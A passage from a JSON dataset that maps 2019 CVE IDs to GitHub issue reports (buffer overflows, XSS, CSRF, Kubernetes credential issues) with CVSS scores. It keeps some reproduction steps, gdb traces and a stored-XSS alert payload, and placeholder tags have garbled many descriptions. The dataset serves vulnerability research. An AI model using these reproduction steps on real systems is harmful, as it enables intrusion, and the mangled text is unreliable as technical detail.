        "Issue_Created_At": "2019-03-22T16:24:33Z",
        "description": "Failed bounds check in APITAG and APITAG and related functions in PATHTAG leading to arbitrary free and OOB pointer write.. Hello Teeworlds dev team, There is a failed bounds check in APITAG and APITAG and related functions which can lead to an arbitrary free and OOB pointer write and possibly leading to RCE. ERRORTAG These functions get called with the integer Index being an arbitrary value thus leading to an arbitrary write of a pointer at the line APITAG and an arbirary free at the line ERRORTAG (which should probably also have a stricter bounds check). ERRORTAG Regards, Mans van Someren FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10879",
        "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2070",
        "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2070",
        "Repo_new": "teeworlds/teeworlds",
        "Issue_Created_At": "2019-03-22T16:05:44Z",
        "description": "Integer overflow(s) in APITAG in PATHTAG Hello Teeworlds dev team, There is an integer overflow bug in APITAG which can lead to a buffer overflow and possibly RCE. The integer overflow(s) occurs when calculating the Size and APITAG ERRORTAG As you can see there is no check to see if Size or APITAG overflow. The integer overflow of APITAG can lead to APITAG being smaller than Size. APITAG then gets used to allocate memory for the APITAG object and Size gets used to read data to this object leading to a buffer overflow. ERRORTAG Regards, Mans van Someren FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10888",
        "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/4",
        "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/4",
        "Repo_new": "yxcmf/ukcms",
        "Issue_Created_At": "2019-04-02T03:23:50Z",
        "description": "PATHTAG CSRF NUMBERTAG before FILETAG click dirty button FILETAG adding user FILETAG add succeed FILETAG EXP: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10904",
        "Issue_Url_old": "https://github.com/python/bugs.python.org/issues/34",
        "Issue_Url_new": "https://github.com/python/bugs.python.org/issues/34",
        "Repo_new": "python/bugs.python.org",
        "Issue_Created_At": "2019-03-21T15:31:57Z",
        "description": "XSS on ERRORTAG page of APITAG There's an XSS on the error page of APITAG CVETAG APITAG sure if this is the right place to report it, I already reported it to the python bugtracker itself despite it having no proper category for it CVETAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10905",
        "Issue_Url_old": "https://github.com/erusev/parsedown/issues/699",
        "Issue_Url_new": "https://github.com/erusev/parsedown/issues/699",
        "Repo_new": "erusev/parsedown",
        "Issue_Created_At": "2019-03-17T16:16:17Z",
        "description": "Injecting classnames into code blocks. In safe mode with html markup disabled, it is possible to insert any classname into a code block like this: > \\ APITAG renders as: APITAG infostring needs some cleanup here: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-10914",
        "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/26",
        "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/26",
        "Repo_new": "matrixssl/matrixssl",
        "Issue_Created_At": "2019-02-15T00:05:35Z",
        "description": "URGENT: Stack buffer overflow verifying NUMBERTAG certificate. Hello, while auditing some code using the APITAG library (currently sold as the Inside Secure TLS Toolkit, previously also called GUARD TLS Toolkit), I happened to notice that a public NUMBERTAG certificate testcase for CVETAG caused a stack buffer overflow. I cleaned up the testcase a bit, to make a better demonstration. You can test it with the APITAG tool that comes with APITAG CODETAG I believe any client or server that validates certificates will be affected by this, and as APITAG is usually used in embedded devices where mitigations are usually not quite as thorough as modern distributions, exploitation might not be difficult. The bug is that APITAG uses a fixed size stack buffer, but then doesn't check if the key size exceeds it. The patch below\u00a0should solve it. ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11002",
        "Issue_Url_old": "https://github.com/Dogfalo/materialize/issues/6286",
        "Issue_Url_new": "https://github.com/dogfalo/materialize/issues/6286",
        "Repo_new": "dogfalo/materialize",
        "Issue_Created_At": "2019-02-08T16:46:36Z",
        "description": "Security question: Use HTML by default for PATHTAG and expose an XSS. Expected Behavior Don't execute html/javascript by default for Toasts, Tooltips and Autocomplete Current Behavior By default when you add dynamics contents like Toast, Tooltips and autocomplete you inject inputs data as HTML. I think all people who use APITAG implement compontents like your examples. It's a bad practice and by default, your input data could be sanitize or use APITAG instead APITAG or APITAG = APITAG Possible Solution If you want allow HTML, why not but sanitize the html and don't allow javascript. If the end user want allow HTML and javascript add a new configuration with a parameter like options : { APITAG true } Steps to Reproduce (for bugs) Toast APITAG Tooltips APITAG Autocomplete CODETAG Context I'm agree about the developper need control his data before inject it in a third party library but sametime we forget to do it. How i find this case NUMBERTAG APITAG Send javascript in a field NUMBERTAG APITAG Server fail and return message with javascript NUMBERTAG APITAG Reuse the message from the server and use the Toast NUMBERTAG I have a reflected XSS It's my fault, I didn't validate datas and I returned this script without sanitize. If by default your library don't allow html, I will not find this behavior. Your Environment Version used NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11018",
        "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/173",
        "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/173",
        "Repo_new": "zoujingli/thinkadmin",
        "Issue_Created_At": "2019-04-06T13:40:53Z",
        "description": "APITAG NUMBERTAG authority APITAG Disclosure vulnerability. There is a authority APITAG Disclosure vulnerability APITAG NUMBERTAG As admin,if you change your password,your cookie won't become invalid. And it won't become invalid until the end of Life Cycle.So if attackers got admin's cookie,though traces of the attackers were found,and admin change his password,but attackers still can enter the managed system. POC: APITAG the attacker got admin's cookie. FILETAG NUMBERTAG We use Edit_this_cookie to change cookie . FILETAG APITAG change his own password FILETAG NUMBERTAG We can see attackers still have access to this manage system. FILETAG I have analysised source code that result in this vulnerabilty. The problem present to PATHTAG The original source code is: ERRORTAG And for this,I have make a padding. ERRORTAG Author:schur EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11024",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/85",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/85",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-03-29T05:47:49Z",
        "description": "infinite recursive loop in load_pnm( ). Description : we Observerd an infinite recursive loop at function load_pnm( ) at file frompnm.c which can lead to a denial of service attack. Command : ./img2sixel APITAG w NUMBERTAG h NUMBERTAG q auto l force o out $POC POC : REPRODUCER URLTAG DEBUG : ~~~ Gdb: [ Legend: Modified register | Code | Heap | Stack | String ] APITAG registers \u2500\u2500\u2500\u2500 $ra NUMBERTAG fffffffd NUMBERTAG f NUMBERTAG rb NUMBERTAG fffffffd2a NUMBERTAG fffffffd NUMBERTAG rc NUMBERTAG fffffffd NUMBERTAG rd NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG rbp NUMBERTAG fffffffd2c NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffffd7f NUMBERTAG fffffffddb NUMBERTAG c NUMBERTAG APITAG push r NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rip NUMBERTAG ffff6c NUMBERTAG ec1 \u2192 APITAG mov rax, QWORD PTR [rbp NUMBERTAG f0] $r NUMBERTAG r NUMBERTAG d0 $r NUMBERTAG b1 $r NUMBERTAG ffff6ef6ab0 \u2192 APITAG push rbp $r NUMBERTAG ffffffff9fc NUMBERTAG r NUMBERTAG fffffffcfe NUMBERTAG b NUMBERTAG ab3 $r NUMBERTAG fffffffcfe NUMBERTAG b NUMBERTAG ab3 $r NUMBERTAG eflags: [CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $cs NUMBERTAG ss NUMBERTAG b $ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG APITAG stack NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG ffffffff NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG dfcc NUMBERTAG ffffffff NUMBERTAG fffffffcf NUMBERTAG dfc NUMBERTAG fffffffcf NUMBERTAG dfb NUMBERTAG efb NUMBERTAG ffff NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG APITAG code NUMBERTAG ffff6c NUMBERTAG eac APITAG mov QWORD PTR [rbp NUMBERTAG ra NUMBERTAG ffff6c NUMBERTAG eb3 APITAG lea rax, [rb NUMBERTAG ffff6c NUMBERTAG eba APITAG mov QWORD PTR [rbp NUMBERTAG f0], ra NUMBERTAG ffff6c NUMBERTAG ec1 APITAG mov rax, QWORD PTR [rbp NUMBERTAG f NUMBERTAG ffff6c NUMBERTAG ec8 APITAG mov rdx, ra NUMBERTAG ffff6c NUMBERTAG ecb APITAG shr rd NUMBERTAG ffff6c NUMBERTAG ecf APITAG add rd NUMBERTAG fff NUMBERTAG ffff6c NUMBERTAG ed6 APITAG movzx edx, BYTE PTR [rd NUMBERTAG ffff6c NUMBERTAG ed9 APITAG test dl, dl APITAG APITAG NUMBERTAG for (y NUMBERTAG y APITAG = end NUMBERTAG break NUMBERTAG p = pnm_get_line(p, end, tmp NUMBERTAG s = tmp; APITAG threads NUMBERTAG Id NUMBERTAG Name: \"img2sixel\", stopped, reason: SIGINT APITAG trace NUMBERTAG ffff6c NUMBERTAG ec1 \u2192 load_pnm(p NUMBERTAG d NUMBERTAG a NUMBERTAG repeats NUMBERTAG times>, length NUMBERTAG allocator NUMBERTAG dfd0, result NUMBERTAG dfb8, ps NUMBERTAG dfc8, psy NUMBERTAG dfcc, ppalette NUMBERTAG pncolors NUMBERTAG dfd0, ppixelformat NUMBERTAG dfd NUMBERTAG ffff6c NUMBERTAG b3 \u2192 APITAG fstatic NUMBERTAG fuse_palette NUMBERTAG reqcolors NUMBERTAG bgcolor NUMBERTAG loop_control NUMBERTAG fn_load NUMBERTAG ffff6c NUMBERTAG ad6 APITAG , context NUMBERTAG f NUMBERTAG ffff6c NUMBERTAG f \u2192 APITAG \"hang NUMBERTAG fstatic NUMBERTAG fuse_palette NUMBERTAG reqcolors NUMBERTAG bgcolor NUMBERTAG loop_control NUMBERTAG fn_load NUMBERTAG ffff6c NUMBERTAG ad6 APITAG , finsecure NUMBERTAG cancel_flag NUMBERTAG ac0 APITAG , context NUMBERTAG f NUMBERTAG allocator NUMBERTAG dfd NUMBERTAG ffff6c NUMBERTAG f5b \u2192 APITAG filename NUMBERTAG fffffffe2b1 \"hang NUMBERTAG ce \u2192 main(argc NUMBERTAG d, arg NUMBERTAG fffffffde NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11025",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2581",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/2581",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2019-03-28T10:14:04Z",
        "description": "Stored XSS in \"SNMP community string\" field . Describe the bug There's no escape being done before printing out the value of ERRORTAG (SNMP Options) in the View poller cache . To Reproduce Steps to reproduce the behavior NUMBERTAG Login as normal user ( should have device creation explicitly enabled NUMBERTAG Select create a new device from the console menu NUMBERTAG Enter the below shared payload into the \" ERRORTAG APITAG alert('XSS'); APITAG APITAG APITAG Admin CODETAG APITAG . ' ' . $item['snmp_community'] `",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-11027",
        "Issue_Url_old": "https://github.com/openid/ruby-openid/issues/122",
        "Issue_Url_new": "https://github.com/openid/ruby-openid/issues/122",
        "Repo_new": "openid/ruby-openid",
        "Issue_Created_At": "2019-06-11T13:50:34Z",
        "description": "Question concerning CVETAG . Hi, I have a question concerning the recently CVE NUMBERTAG Could you provide some background which version/commit fixes the issue? Rubygems NUMBERTAG only shows version NUMBERTAG Was version NUMBERTAG pulled because of the CVE or was NUMBERTAG just not uploaded by accident ? Thanks NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11038",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/501",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/501",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2019-05-31T20:28:02Z",
        "description": "Uninitialized read in APITAG ( CVETAG ). There is a GD related issue fixed in PHP NUMBERTAG and NUMBERTAG which was assigned CVETAG and is in the PHP bug CVETAG . Filling the issue for the correlated issue in the libgd library itself.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11082",
        "Issue_Url_old": "https://github.com/dkpro/dkpro-core/issues/1325",
        "Issue_Url_new": "https://github.com/dkpro/dkpro-core/issues/1325",
        "Repo_new": "dkpro/dkpro-core",
        "Issue_Created_At": "2019-02-12T13:00:10Z",
        "description": "Avoid datasets being extracted outside their target directory. It should be ensured that datasets are only extracted inside their respective cache folder.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11221",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1203",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1203",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-02-12T03:44:32Z",
        "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in gf_import_message () function, media_import.c APITAG overflow when srt file contains more than one txt line and the line is long enough, please see attached crafted file. FILETAG APITAG APITAG import, APITAG e, char format, ...) { if APITAG e ? GF_LOG_WARNING : GF_LOG_INFO)) { va_list args; char APITAG va_start(args, format); APITAG format, args); va_end(args); GF_LOG((u NUMBERTAG e ? GF_LOG_WARNING : GF_LOG_INFO), GF_LOG_AUTHOR, (\"%s \", APITAG ); } return e; } PATHTAG (gdb) set args srt NUMBERTAG crafted_text.srt (gdb) r Starting program: PATHTAG srt NUMBERTAG crafted_text.srt APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Bad SRT formatting expecting number got \"hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hel\" stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG a4 in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG fbbc in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG fb NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG eb in gf_import_message (import NUMBERTAG fffffff9b NUMBERTAG e=GF_CORRUPTED_DATA, format NUMBERTAG ffff7b3d7f0 APITAG SRT formatting expecting number got %s \") at APITAG NUMBERTAG ffff NUMBERTAG db NUMBERTAG in gf_text_import_srt (import NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in gf_import_timed_text (import NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ded NUMBERTAG in gf_media_import (importer NUMBERTAG fffffff9b NUMBERTAG at APITAG NUMBERTAG c NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG patch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11222",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1205",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1205",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-02-13T09:49:56Z",
        "description": "buffer overflow issue NUMBERTAG there is a buffer overflow issue for crypt feature when use a FILETAG file. overflow occur when use a crafted ID NUMBERTAG alue. PATHTAG gdb APITAG (gdb) set args crypt FILETAG overview.mp4 out overview_encrypted.mp4 (gdb) r Starting program: PATHTAG crypt FILETAG overview.mp4 out overview_encrypted.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG [CORE NUMBERTAG bit blob is not NUMBERTAG bytes long: APITAG [XML/NHML] Cannot parse ID NUMBERTAG stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG a4 in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG fbbc in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG fb NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG in gf_xml_parse_bit_sequence_bs (bsroot NUMBERTAG d0, bs NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f in gf_xml_parse_bit_sequence (bsroot NUMBERTAG d0, data NUMBERTAG ffffffbdcb8, data_size NUMBERTAG ffffffbdc NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in gf_cenc_parse_drm_system_info (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7db APITAG at APITAG NUMBERTAG ffff NUMBERTAG ec in gf_crypt_file (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7db APITAG at APITAG NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG patch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11222",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1204",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1204",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-02-13T07:12:39Z",
        "description": "buffer overflow issue NUMBERTAG there is a buffer overflow issue for crypt feature when use a FILETAG file. PATHTAG gdb APITAG (gdb) set args crypt FILETAG overview.mp4 out overview_encrypted.mp4 (gdb) r Starting program: PATHTAG crypt FILETAG overview.mp4 out overview_encrypted.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG [CORE NUMBERTAG bit blob is not NUMBERTAG bytes long: APITAG [CENC] Cannnot parse key value Error in ERRORTAG %s': %s NUMBERTAG s \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG e in malloc_printerr (ptr=<optimized out>, str NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG corrupted unsorted chunks\", action NUMBERTAG at APITAG NUMBERTAG int_free (av=<optimized out>, p=<optimized out>, have_lock NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e1b in APITAG () from PATHTAG NUMBERTAG ffff NUMBERTAG d9 in gzclose_r () from PATHTAG NUMBERTAG ffff NUMBERTAG fd in xml_sax_read_file (parser NUMBERTAG ba NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG db2 in gf_xml_sax_parse_file (parser NUMBERTAG ba NUMBERTAG APITAG APITAG APITAG at APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG a in load_crypt_file (file NUMBERTAG fffffffe7d3 APITAG at APITAG NUMBERTAG ffff NUMBERTAG ad in gf_crypt_file (mp NUMBERTAG c NUMBERTAG drm_file NUMBERTAG fffffffe7d3 APITAG at APITAG NUMBERTAG c in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb)",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11236",
        "Issue_Url_old": "https://github.com/urllib3/urllib3/issues/1553",
        "Issue_Url_new": "https://github.com/urllib3/urllib3/issues/1553",
        "Repo_new": "urllib3/urllib3",
        "Issue_Created_At": "2019-03-18T17:17:07Z",
        "description": "CRLF injection vulnerability. At CVETAG there's an issue in Python's urllib that an attacker controlling the request parameter can inject headers by injecting CR/LF chars. A commenter mentions that the same bug is present in urllib3: CVETAG So reporting it here to make sure it gets attention.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-11243",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/76797",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/76797",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-04-18T21:31:53Z",
        "description": "CVETAG NUMBERTAG APITAG does not remove the serviceaccount credentials from config created by APITAG The APITAG method return a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the following versions, APITAG did not effectively clear service account credentials loaded using APITAG NUMBERTAG What is the impact? APITAG users that use the APITAG method directly with client config loaded with APITAG receive back a client config which can still send the loaded service account token with requests. How was the issue fixed? In NUMBERTAG and NUMBERTAG APITAG was modified to return a client config that is safe to use with the APITAG method ( URLTAG In NUMBERTAG the APITAG will also exclude the APITAG and APITAG fields, in addition to the explicit credential carrying fields. ( URLTAG How do I resolve the issue? Upgrade APITAG to APITAG , APITAG , APITAG , or higher or manually clear the APITAG and APITAG fields in addition to calling APITAG Thanks to Oleg Bulatov for reporting this issue. /area security /kind bug /sig auth /sig api machinery /assign /close",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-11244",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/76676",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/76676",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-04-16T20:14:25Z",
        "description": "World writeable http cache. What happened: The files inside of \".kube/http cache\" are world writeable (rw rw rw ). While the default for these files appears to be the home directory, using the \" cache dir\" flag could put these files into a place where world writeable files would allow any user / process to modify the cache files. Modification of the cache files could influence the kubectl utility in a negative way for other users. What you expected to happen: Apply stricter file permissions to the http cache files. How to reproduce it (as minimally and precisely as possible): Run any generic kubectl command which is successful and then list the cache directory PATHTAG $ kubectl get pods all namespaces $ ls la PATHTAG Anything else we need to know?: I estimate this is a low severity security issue with a CVSS score of NUMBERTAG PATHTAG URLTAG Environment: Linux Kubernetes version (use kubectl APITAG Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Server Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Cloud provider or hardware configuration: AWS. Running kube api server in hyperkube. OS (e.g: cat /etc/os release): APITAG Linux\" APITAG APITAG ID=\"centos\" ID_LIKE=\"rhel fedora\" VERSION_ID NUMBERTAG APITAG Linu NUMBERTAG APITAG ANSI_COLOR NUMBERTAG APITAG HOME_URL=\" FILETAG \" BUG_REPORT_URL=\" CVETAG \" APITAG NUMBERTAG APITAG APITAG APITAG APITAG Kernel (e.g. uname a): Linux APITAG NUMBERTAG APITAG NUMBERTAG SMP Tue Aug NUMBERTAG UTC NUMBERTAG APITAG Install tools: Manual installation. Others: n/a",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.6,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2019-11245",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/78308",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/78308",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-05-24T16:14:49Z",
        "description": "Container uid changes after first restart. APITAG What happened : When I launch a pod from a docker image that specifies a USER in the Dockerfile, the container only runs as that user on its first launch. After that the container runs as UID NUMBERTAG What you expected to happen : I expect the container to act consistently every launch, and probably with the USER specified in the container. How to reproduce it (as minimally and precisely as possible) : Testing with minikube (same test specifying NUMBERTAG kubectl logs test always returns NUMBERTAG ERRORTAG Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): I get the results I expect in NUMBERTAG and NUMBERTAG The problem exists in NUMBERTAG and NUMBERTAG Cloud provider or hardware configuration: minikube NUMBERTAG using APITAG OS (e.g: APITAG ): Kernel (e.g. ERRORTAG ): Install tools: Network plugin and version (if this is a network related bug): Others:",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-11247",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/80983",
